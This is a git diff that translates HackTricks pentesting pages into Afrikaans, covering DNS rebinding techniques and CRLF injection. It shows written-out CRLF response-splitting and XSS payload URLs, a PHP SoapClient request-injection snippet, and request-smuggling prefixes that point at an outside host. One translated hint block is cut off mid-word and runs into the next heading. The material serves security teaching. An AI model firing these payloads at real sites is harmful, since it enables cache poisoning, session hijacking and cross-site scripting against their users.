@@ -313,85 +292,79 @@ You can **bypass CORS checks** such as `e.origin === window.origin` by **creatin
 
 ### DNS Rebinding via TTL
 
-DNS rebinding via TTL is a technique used to bypass certain security measures by manipulating DNS records. Here's how it works:
+DNS rebinding via TTL is 'n tegniek wat gebruik word om sekere sekuriteitsmaatreëls te omseil deur DNS-rekords te manipuleer. So werk dit:
 
-1. The attacker creates a web page and makes the victim access it.
-2. The attacker then changes the DNS (IP) of their own domain to point to the victim's web page.
-3. The victim's browser caches the DNS response, which may have a TTL (Time to Live) value indicating how long the DNS record should be considered valid.
-4. When the TTL expires, the victim's browser makes a new DNS request, allowing the attacker to execute JavaScript code on the victim's page.
-5. By maintaining control over the IP of the victim, the attacker can gather information from the victim without sending any cookies to the victim server.
+1. Die aanvaller skep 'n webbladsy en laat die slagoffer dit besoek.
+2. Die aanvaller verander dan die DNS (IP) van hul eie domein om na die slagoffer se webbladsy te verwys.
+3. Die slagoffer se blaaier stoor die DNS-respons, wat 'n TTL (Time to Live) waarde kan hê wat aandui hoe lank die DNS-rekord as geldig beskou moet word.
+4. Wanneer die TTL verval, maak die slagoffer se blaaier 'n nuwe DNS-versoek, wat die aanvaller in staat stel om JavaScript-kode op die slagoffer se bladsy uit te voer.
+5. Deur beheer oor die IP van die slagoffer te behou, kan die aanvaller inligting van die slagoffer versamel sonder om enige koekies na die slagofferbediener te stuur.
 
-It's important to note that browsers have caching mechanisms that may prevent immediate abuse of this technique, even with low TTL values.
+Dit is belangrik om daarop te let dat blaaier kantvergrendelingsmeganismes het wat dadelike misbruik van hierdie tegniek mag voorkom, selfs met lae TTL-waardes.
 
-DNS rebinding can be useful for bypassing explicit IP checks performed by the victim or for scenarios where a user or bot remains on the same page for an extended period, allowing the cache to expire.
+DNS rebinding kan nuttig wees om eksplisiete IP-kontroles wat deur die slagoffer uitgevoer word, te omseil, of vir scenario's waar 'n gebruiker of robot vir 'n lang tydperk op dieselfde bladsy bly, wat die cache laat verval.
 
-If you need a quick way to abuse DNS rebinding, you can use services like [https://lock.cmpxchg8b.com/rebinder.html](https://lock.cmpxchg8b.com/rebinder.html).
+As jy 'n vinnige manier nodig het om DNS rebinding te misbruik, kan jy dienste soos [https://lock.cmpxchg8b.com/rebinder.html](https://lock.cmpxchg8b.com/rebinder.html) gebruik.
 
-To run your own DNS rebinding server, you can utilize tools like **DNSrebinder** ([https://github.com/mogwailabs/DNSrebinder](https://github.com/mogwailabs/DNSrebinder)). This involves exposing your local port 53/udp, creating an A record pointing to it (e.g., ns.example.com), and creating an NS record pointing to the previously created A subdomain (e.g., ns.example.com). Any subdomain of the ns.example.com subdomain will then be resolved by your host.
+Om jou eie DNS rebinding-bediener te bedryf, kan jy gereedskap soos **DNSrebinder** ([https://github.com/mogwailabs/DNSrebinder](https://github.com/mogwailabs/DNSrebinder)) gebruik. Dit behels die blootstelling van jou plaaslike poort 53/udp, die skep van 'n A-rekord wat daarna verwys (bv. ns.example.com), en die skep van 'n NS-rekord wat na die vorige geskepte A-subdomein verwys (bv. ns.example.com). Enige subdomein van die ns.example.com-subdomein sal dan deur jou gasheer opgelos word.
 
-You can also explore a publicly running server at [http://rebind.it/singularity.html](http://rebind.it/singularity.html) for further understanding and experimentation.
+Jy kan ook 'n openbare bediener verken by [http://rebind.it/singularity.html](http://rebind.it/singularity.html) vir verdere begrip en eksperimentering.
 
-### DNS Rebinding via **DNS Cache Flooding**
+### DNS Rebinding via **DNS-cache-oorstroming**
 
-DNS rebinding via DNS cache flooding is another technique used to bypass the caching mechanism of browsers and force a second DNS request. Here's how it works:
+DNS rebinding via DNS-cache-oorstroming is 'n ander tegniek wat gebruik word om die kasgeheue van blaaier te omseil en 'n tweede DNS-versoek af te dwing. So werk dit:
 
-1. Initially, when the victim makes a DNS request, it is responded with the attacker's IP address.
-2. To bypass the caching defense, the attacker leverages a service worker. The service worker floods the DNS cache, which effectively deletes the cached attacker server name.
-3. When the victim's browser makes a second DNS request, it is now responded with the IP address 127.0.0.1, which typically refers to the localhost.
+1. Aanvanklik, wanneer die slagoffer 'n DNS-versoek maak, word daar gereageer met die IP-adres van die aanvaller.
+2. Om die kasverdediging te omseil, maak die aanvaller gebruik van 'n dienswerker. Die dienswerker oorstroom die DNS-kas, wat die gekasgeheueerde aanvallerbediener se naam effektief uitvee.
+3. Wanneer die slagoffer se blaaier 'n tweede DNS-versoek maak, word daar nou gereageer met die IP-adres 127.0.0.1, wat tipies na die plaaslike gasheer verwys.
 
-By flooding the DNS cache with the service worker, the attacker can manipulate the DNS resolution process and force the victim's browser to make a second request, this time resolving to the attacker's desired IP address.
+Deur die DNS-kas met die dienswerker te oorstroom, kan die aanvaller die DNS-oplossingsproses manipuleer en die slagoffer se blaaier dwing om 'n tweede versoek te maak wat hierdie keer na die gewenste IP-adres van die aanvaller oplos.
 
-### DNS Rebinding via **Cache**
+### DNS Rebinding via **Kas**
 
-Another way to bypass the caching defense is by utilizing multiple IP addresses for the same subdomain in the DNS provider. Here's how it works:
+'n Ander manier om die kasverdediging te omseil, is deur gebruik te maak van verskeie IP-adresse vir dieselfde subdomein in die DNS-leweransier. So werk dit:
 
-1. The attacker sets up two A records (or a single A record with two IPs) for the same subdomain in the DNS provider.
-2. When a browser checks for these records, it receives both IP addresses.
-3. If the browser decides to use the attacker's IP address first, the attacker can serve a payload that performs HTTP requests to the same domain.
-4. However, once the attacker obtains the victim's IP address, they stop responding to the victim's browser.
-5. The victim's browser, upon realizing that the domain is unresponsive, moves on to use the second given IP address.
-6. By accessing the second IP address, the browser bypasses the Same Origin Policy (SOP), allowing the attacker to abuse this and gather and exfiltrate information.
+1. Die aanvaller stel twee A-rekords (of 'n enkele A-rekord met twee IP-adresse) op vir dieselfde subdomein in die DNS-leweransier.
+2. Wanneer 'n blaaier hierdie rekords nagaan, ontvang dit beide IP-adresse.
+3. As die blaaier besluit om die aanvaller se IP-adres eerste te gebruik, kan die aanvaller 'n nutslading dien wat HTTP-versoeke na dieselfde domein uitvoer.
+4. Sodra die aanvaller egter die slagoffer se IP-adres verkry, hou hulle op om op die slagoffer se blaaier te reageer.
+5. Die slagoffer se blaaier, nadat dit besef dat die domein onbeskikbaar is, gaan voort om die tweede gegee IP-adres te gebruik.
+6. Deur toegang tot die tweede IP-adres te verkry, omseil die blaaier die Same Origin Policy (SOP), wat die aanvaller in staat stel om hierdie te misbruik en inligting van die slagoffer te versamel en uit te voer.
 
-This technique leverages the behavior of browsers when multiple IP addresses are provided for a domain. By strategically controlling the responses and manipulating the browser's choice of IP address, an attacker can exploit the SOP and access information from the victim.
+Hierdie tegniek maak gebruik van die gedrag van blaaier wanneer verskeie IP-adresse vir 'n domein verskaf word. Deur die antwoorde strategies te beheer en die blaaier se keuse van IP-adres te manipuleer, kan 'n aanvaller die SOP uitbuit en toegang verkry tot inligting van die slagoffer.
 
 {% hint style="warning" %}
-Note that in order to access localhost you should try to rebind **127.0.0.1** in Windows and **0.0.0.0** in linux.\
-Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
+Let daarop dat jy, om toegang tot localhost te verkry, moet probeer om **127.0.0.1** in Windows en **0.0.0.0** in Linux te herbind.\
+Verskaffers soos godaddy of cloudflare het my nie toeg
+### Ander algemene omseilings
 
-
-{% endhint %}
+* As **interne IP-adresse nie toegelaat word nie**, het hulle dalk **vergeet om 0.0.0.0 te verbied** (werk op Linux en Mac)
+* As **interne IP-adresse nie toegelaat word nie**, reageer met 'n **CNAME** na **localhost** (werk op Linux en Mac)
+* As **interne IP-adresse nie toegelaat word nie** as DNS-antwoorde nie, kan jy **CNAMEs na interne dienste** soos www.corporate.internal antwoord.
 
-For more info you can check [https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/)
+### Gewapende DNS Rebidding
 
-### Other Common Bypasses
+Jy kan meer inligting oor die vorige omseilings tegnieke en hoe om die volgende instrument te gebruik, vind in die praatjie [Gerald Doussot - State of DNS Rebinding Attacks & Singularity of Origin - DEF CON 27 Conference](https://www.youtube.com/watch?v=y9-0lICNjOQ).
 
-* If **internal IPs aren't allowed**, they might **forgot forbidding 0.0.0.0** (works on Linux and Mac)
-* If **internal IPs aren't allowed**, respond with a **CNAME** to **localhost** (works on Linux and Ma
-* If **internal IPs aren't allowed** as DNS responses, you can respond **CNAMEs to internal services** such as www.corporate.internal.
+[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is 'n instrument om [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) aanvalle uit te voer. Dit sluit die nodige komponente in om die IP-adres van die aanvalbediener se DNS-naam te herbind na die teikermasjien se IP-adres en om aanvalspakketten te bedien om kwesbare sagteware op die teikermasjien uit te buit.
 
-### DNS Rebidding Weaponized
+### Werklike beskerming teen DNS Rebinding
 
-You can find more information about the previous bypass techniques and how to use the following tool in the talk [Gerald Doussot - State of DNS Rebinding Attacks & Singularity of Origin - DEF CON 27 Conference](https://www.youtube.com/watch?v=y9-0lICNjOQ).
+* Gebruik TLS in interne dienste
+* Versoek verifikasie om toegang tot data te verkry
+* Valideer die Host-kop
+* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): Voorstel om altyd 'n voorafgaande versoek te stuur wanneer openbare bedieners toegang tot interne bedieners wil verkry
 
-[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
+## **Instrumente**
 
-### Real Protection against DNS Rebinding
-
-* Use TLS in internal services
-* Request authentication to access data
-* Validate the Host header
-* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): Proposal to always send a pre-flight request when public servers want to access internal servers
-
-## **Tools**
-
-**Fuzz possible misconfigurations in CORS policies**
+**Fuzz moontlike verkeerde konfigurasies in CORS-beleide**
 
 * [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner)
 * [https://github.com/lc/theftfuzzer](https://github.com/lc/theftfuzzer)
 * [https://github.com/s0md3v/Corsy](https://github.com/s0md3v/Corsy)
 * [https://github.com/Shivangx01b/CorsMe](https://github.com/Shivangx01b/CorsMe)
 
-## References
+## Verwysings
 * [https://portswigger.net/web-security/cors](https://portswigger.net/web-security/cors)
 * [https://portswigger.net/web-security/cors/access-control-allow-origin](https://portswigger.net/web-security/cors/access-control-allow-origin)
 * [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers#CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers#CORS)
@@ -405,14 +378,14 @@ You can find more information about the previous bypass techniques and how to us
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 

diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md
index 213473aa6..0e6bff2e6 100644
--- a/pentesting-web/crlf-0d-0a.md
+++ b/pentesting-web/crlf-0d-0a.md
@@ -1,214 +1,193 @@
-# CRLF (%0D%0A) Injection
+# CRLF (%0D%0A) Injeksie
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 ### CRLF
 
-Carriage Return (CR) and Line Feed (LF), collectively known as CRLF, are special character sequences used in the HTTP protocol to denote the end of a line or the start of a new one. Web servers and browsers use CRLF to distinguish between HTTP headers and the body of a response. These characters are universally employed in HTTP/1.1 communications across various web server types, such as Apache and Microsoft IIS.
+Carriage Return (CR) en Line Feed (LF), algemeen bekend as CRLF, is spesiale karakterreeks wat in die HTTP-protokol gebruik word om die einde van 'n lyn of die begin van 'n nuwe een aan te dui. Webbedieners en webblaaier gebruik CRLF om onderskeid te maak tussen HTTP-koppe en die liggaam van 'n respons. Hierdie karakters word universeel gebruik in HTTP/1.1-kommunikasie oor verskillende tipes webbedieners, soos Apache en Microsoft IIS.
 
-### CRLF Injection Vulnerability
+### CRLF Injeksiekwesbaarheid
 
-CRLF injection involves the insertion of CR and LF characters into user-supplied input. This action misleads the server, application, or user into interpreting the injected sequence as the end of one response and the beginning of another. While these characters are not inherently harmful, their misuse can lead to HTTP response splitting and other malicious activities.
+CRLF-injeksie behels die invoeging van CR- en LF-karakters in gebruikersverskafte insette. Hierdie aksie mislei die bediener, toepassing of gebruiker om die ingespotte volgorde te interpreteer as die einde van een respons en die begin van 'n ander. Alhoewel hierdie karakters nie inherent skadelik is nie, kan hul misbruik lei tot HTTP-responsverdeling en ander skadelike aktiwiteite.
 
-### Example: CRLF Injection in a Log File
+### Voorbeeld: CRLF-injeksie in 'n Loglêer
 
-[Example from here](https://www.invicti.com/blog/web-security/crlf-http-header/)
-
-Consider a log file in an admin panel that follows the format: `IP - Time - Visited Path`. A typical entry might look like:
+[Voorbeeld van hier](https://www.invicti.com/blog/web-security/crlf-http-header/)
 
+Beskou 'n loglêer in 'n administratiewe paneel wat die formaat volg: `IP - Tyd - Besoekte Pad`. 'n Tipiese inskrywing kan lyk soos:
 ```
 123.123.123.123 - 08:15 - /index.php?page=home
 ```
-
-An attacker can exploit a CRLF injection to manipulate this log. By injecting CRLF characters into the HTTP request, the attacker can alter the output stream and fabricate log entries. For instance, an injected sequence might transform the log entry into:
-
+'n Aanvaller kan 'n CRLF-inspuiting benut om hierdie log te manipuleer. Deur CRLF-karakters in die HTTP-versoek in te spuit, kan die aanvaller die uitvoerstroom verander en loginskrywings vervals. Byvoorbeeld, 'n ingespotte reeks kan die loginskrywing transformeer na: '
 ```
 /index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
 ```
-
-Here, `%0d` and `%0a` represent the URL-encoded forms of CR and LF. Post-attack, the log would misleadingly display:
-
+Hier, `%0d` en `%0a` verteenwoordig die URL-gekodeerde vorms van CR en LF. Na die aanval sal die log misleidend wys:
 ```
 IP - Time - Visited Path
 
 123.123.123.123 - 08:15 - /index.php?page=home&
 127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
 ```
-
-The attacker thus cloaks their malicious activities by making it appear as if the localhost (an entity typically trusted within the server environment) performed the actions. The server interprets the part of the query starting with `%0d%0a` as a single parameter, while the `restrictedaction` parameter is parsed as another, separate input. The manipulated query effectively mimics a legitimate administrative command: `/index.php?page=home&restrictedaction=edit`
+Die aanvaller vermom dus hul skadelike aktiwiteite deur dit te laat lyk asof die localhost (‘n entiteit wat tipies vertrou word binne die bedieneromgewing) die aksies uitgevoer het. Die bediener interpreteer die gedeelte van die navraag wat begin met `%0d%0a` as 'n enkele parameter, terwyl die `restrictedaction` parameter as 'n ander, afsonderlike inset geanaliseer word. Die gemanipuleerde navraag boots effektief 'n legitieme administratiewe bevel na: `/index.php?page=home&restrictedaction=edit`
 
 
-### HTTP Response Splitting
+### HTTP-reaksiesplitsing
 
-#### Description
+#### Beskrywing
 
-HTTP Response Splitting is a security vulnerability that arises when an attacker exploits the structure of HTTP responses. This structure separates headers from the body using a specific character sequence, Carriage Return (CR) followed by Line Feed (LF), collectively termed as CRLF. If an attacker manages to insert a CRLF sequence into a response header, they can effectively manipulate the subsequent response content. This type of manipulation can lead to severe security issues, notably Cross-site Scripting (XSS).
+HTTP-reaksiesplitsing is 'n sekuriteitskwesbaarheid wat ontstaan wanneer 'n aanvaller die struktuur van HTTP-reaksies uitbuit. Hierdie struktuur skei koppe van die liggaam deur 'n spesifieke karaktervolgorde, Carriage Return (CR) gevolg deur Line Feed (LF), wat gesamentlik as CRLF bekend staan. As 'n aanvaller daarin slaag om 'n CRLF-volgorde in 'n reaksiekop in te voeg, kan hulle die daaropvolgende reaksie-inhoud effektief manipuleer. Hierdie tipe manipulasie kan lei tot ernstige sekuriteitskwessies, veral Cross-site Scripting (XSS).
 
-#### XSS through HTTP Response Splitting
+#### XSS deur HTTP-reaksiesplitsing
 
-1. The application sets a custom header like this: `X-Custom-Header: UserInput`
-2. The application fetches the value for `UserInput` from a query parameter, say "user_input". In scenarios lacking proper input validation and encoding, an attacker can craft a payload that includes the CRLF sequence, followed by malicious content.
-3. An attacker crafts a URL with a specially crafted 'user_input': `?user_input=Value%0d%0a%0d%0a`
-    - In this URL, `%0d%0a%0d%0a` is the URL-encoded form of CRLFCRLF. It tricks the server into inserting a CRLF sequence, making the server treat the subsequent part as the response body.
-4. The server reflects the attacker's input in the response header, leading to an unintended response structure where the malicious script is interpreted by the browser as part of the response body.
+1. Die toepassing stel 'n aangepaste kop soos volg in: `X-Aangepaste-Kop: GebruikerInvoer`
+2. Die toepassing haal die waarde vir `GebruikerInvoer` uit 'n navraagparameter, sê "gebruiker_invoer". In scenario's waar behoorlike insetvalidering en kodering ontbreek, kan 'n aanvaller 'n lading skep wat die CRLF-volgorde insluit, gevolg deur skadelike inhoud.
+3. 'n Aanvaller skep 'n URL met 'n spesiaal vervaardigde 'gebruiker_invoer': `?gebruiker_invoer=Waarde%0d%0a%0d%0a`
+- In hierdie URL is `%0d%0a%0d%0a` die URL-gekodeerde vorm van CRLFCRLF. Dit mislei die bediener om 'n CRLF-volgorde in te voeg, sodat die bediener die daaropvolgende gedeelte as die reaksie-liggaam hanteer.
+4. Die bediener weerspieël die aanvaller se inset in die reaksiekop, wat lei tot 'n onbedoelde reaksie-struktuur waar die skadelike skrips deur die blaaier geïnterpreteer word as deel van die reaksie-liggaam.
 
-#### An example of HTTP Response Splitting leading to Redirect
+#### 'n Voorbeeld van HTTP-reaksiesplitsing wat tot 'n omleiding lei
 
-From [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)
-
-Browser to:
+Vanaf [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)
 
+Blaaier na:
 ```
 /%0d%0aLocation:%20http://myweb.com
 ```
-
-And the server responses with the header:
-
+En die bediener reageer met die kop:
 ```
 Location: http://myweb.com
 ```
-
-**Other example: (from** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
-
+**Ander voorbeeld: (vanaf** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
 ```
 http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
 ```
+#### In URL Pad
 
-#### In URL Path
-
-You can send the payload **inside the URL path** to control the **response** from the server (example from [here](https://hackerone.com/reports/192667)):
-
+Jy kan die payload **binne die URL-pad** stuur om die **respons** van die bediener te beheer (voorbeeld van [hier](https://hackerone.com/reports/192667)):
 ```
 http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
 http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
 ```
-
-Check more examples in:
+Kyk na meer voorbeelde in:
 
 {% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
 
-### HTTP Header Injection
+### HTTP Kopinjeksie
 
-HTTP Header Injection, often exploited through CRLF (Carriage Return and Line Feed) injection, allows attackers to insert HTTP headers. This can undermine security mechanisms such as XSS (Cross-Site Scripting) filters or the SOP (Same-Origin Policy), potentially leading to unauthorized access to sensitive data, such as CSRF tokens, or the manipulation of user sessions through cookie planting.
+HTTP Kopinjeksie, dikwels uitgebuit deur CRLF (Carriage Return en Line Feed) injeksie, stel aanvallers in staat om HTTP koppe in te voeg. Dit kan sekuriteitsmeganismes soos XSS (Cross-Site Scripting) filters of die SOP (Same-Origin Policy) ondermyn, wat moontlik kan lei tot ongemagtigde toegang tot sensitiewe data, soos CSRF tokens, of die manipulasie van gebruikersessies deur middel van koekieplanting.
 
-#### Exploiting CORS via HTTP Header Injection
+#### Uitbuiting van CORS via HTTP Kopinjeksie
 
-An attacker can inject HTTP headers to enable CORS (Cross-Origin Resource Sharing), bypassing the restrictions imposed by SOP. This breach allows scripts from malicious origins to interact with resources from a different origin, potentially accessing protected data.
+'n Aanvaller kan HTTP koppe inspuit om CORS (Cross-Origin Resource Sharing) moontlik te maak, deur die beperkings wat deur SOP opgelê word, te omseil. Hierdie oortreding maak dit vir skrips van skadelike oorsprong moontlik om met hulpbronne van 'n ander oorsprong te interaksieer, wat moontlik toegang tot beskermde data kan gee.
 
-#### SSRF and HTTP Request Injection via CRLF
-
-CRLF injection can be utilized to craft and inject an entirely new HTTP request. A notable example of this is the vulnerability in PHP's `SoapClient` class, specifically within the `user_agent` parameter. By manipulating this parameter, an attacker can insert additional headers and body content, or even inject a new HTTP request entirely. Below is a PHP example demonstrating this exploitation:
+#### SSRF en HTTP Versoekinjeksie via CRLF
 
+CRLF-injeksie kan gebruik word om 'n heeltemal nuwe HTTP-versoek te skep en in te spuit. 'n Noemenswaardige voorbeeld hiervan is die kwesbaarheid in PHP se `SoapClient`-klas, spesifiek binne die `user_agent`-parameter. Deur hierdie parameter te manipuleer, kan 'n aanvaller bykomende koppe en liggaamsinhoud invoeg, of selfs 'n heeltemal nuwe HTTP-versoek inspuit. Hieronder is 'n PHP-voorbeeld wat hierdie uitbuiting demonstreer:
 ```php
-$target = 'http://127.0.0.1:9090/test'; 
+$target = 'http://127.0.0.1:9090/test';
 $post_string = 'variable=post value';
 $crlf = array(
-    'POST /proxy HTTP/1.1',
-    'Host: local.host.htb',
-    'Cookie: PHPSESSID=[PHPSESSID]',
-    'Content-Type: application/x-www-form-urlencoded',
-    'Content-Length: '.(string)strlen($post_string),
-    "\r\n",
-    $post_string
+'POST /proxy HTTP/1.1',
+'Host: local.host.htb',
+'Cookie: PHPSESSID=[PHPSESSID]',
+'Content-Type: application/x-www-form-urlencoded',
+'Content-Length: '.(string)strlen($post_string),
+"\r\n",
+$post_string
 );
 
 $client = new SoapClient(null,
-    array(
-        'uri'=>$target,
-        'location'=>$target,
-        'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
-    )
+array(
+'uri'=>$target,
+'location'=>$target,
+'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
+)
 );
 
 # Put a netcat listener on port 9090
 $client->__soapCall("test", []);
 ```
+### Invoeging van koptekste om versoeksmokkeling te doen
 
-### Header Injection to Request Smuggling
-
-For more info about this technique and potential problems [**check the original source**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning).
-
-You can inject essential headers to ensure the **back-end keeps the connection open** after responding to the initial request:
+Vir meer inligting oor hierdie tegniek en potensiële probleme [**kyk na die oorspronklike bron**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning).
 
+Jy kan noodsaaklike koptekste invoeg om te verseker dat die **agterste gedeelte die verbinding oop hou** nadat dit op die aanvanklike versoek gereageer het:
 ```
 GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
 ```
+Daarna kan 'n tweede versoek gespesifiseer word. Hierdie scenario behels gewoonlik [HTTP-versoeksmokkelary](http-request-smuggling/), 'n tegniek waar ekstra koppe of liggaamselemente wat deur die bediener na inspuiting bygevoeg word, kan lei tot verskeie sekuriteitskwessies.
 
-Afterward, a second request can be specified. This scenario typically involves [HTTP request smuggling](http-request-smuggling/), a technique where extra headers or body elements appended by the server post-injection can lead to various security exploits.
+**Uitbuiting:**
 
-**Exploitation:**
-
-
-1. **Malicious Prefix Injection**: This method involves poisoning the next user's request or a web cache by specifying a malicious prefix. An example of this is:
+1. **Boosaardige Voorvoegselinspuiting**: Hierdie metode behels die vergiftiging van die volgende gebruiker se versoek of 'n webgeheue deur 'n boosaardige voorvoegsel te spesifiseer. 'n Voorbeeld hiervan is:
 
 `GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`
 
-2. **Crafting a Prefix for Response Queue Poisoning**: This approach involves creating a prefix that, when combined with trailing junk, forms a complete second request. This can trigger response queue poisoning. An example is:
+2. **Skep 'n Voorvoegsel vir Vergiftiging van Reaksie-ry**: Hierdie benadering behels die skep van 'n voorvoegsel wat, wanneer dit gekombineer word met oorblywende rommel, 'n volledige tweede versoek vorm. Dit kan reaksie-ry-vergiftiging teweegbring. 'n Voorbeeld hiervan is:
 
 `GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`
 
-### Memcache Injection
+### Memcache-inspuiting
 
-Memcache is a **key-value store that uses a clear text protocol**. More info in:
+Memcache is 'n **sleutel-waarde-stoor wat 'n duidelike teksprotokol gebruik**. Meer inligting in:
 
 {% content-ref url="../network-services-pentesting/11211-memcache/" %}
 [11211-memcache](../network-services-pentesting/11211-memcache/)
 {% endcontent-ref %}
 
-**For the full information read the**[ **original writeup**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)
+**Vir die volledige inligting lees die**[ **oorspronklike skryfstuk**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)
 
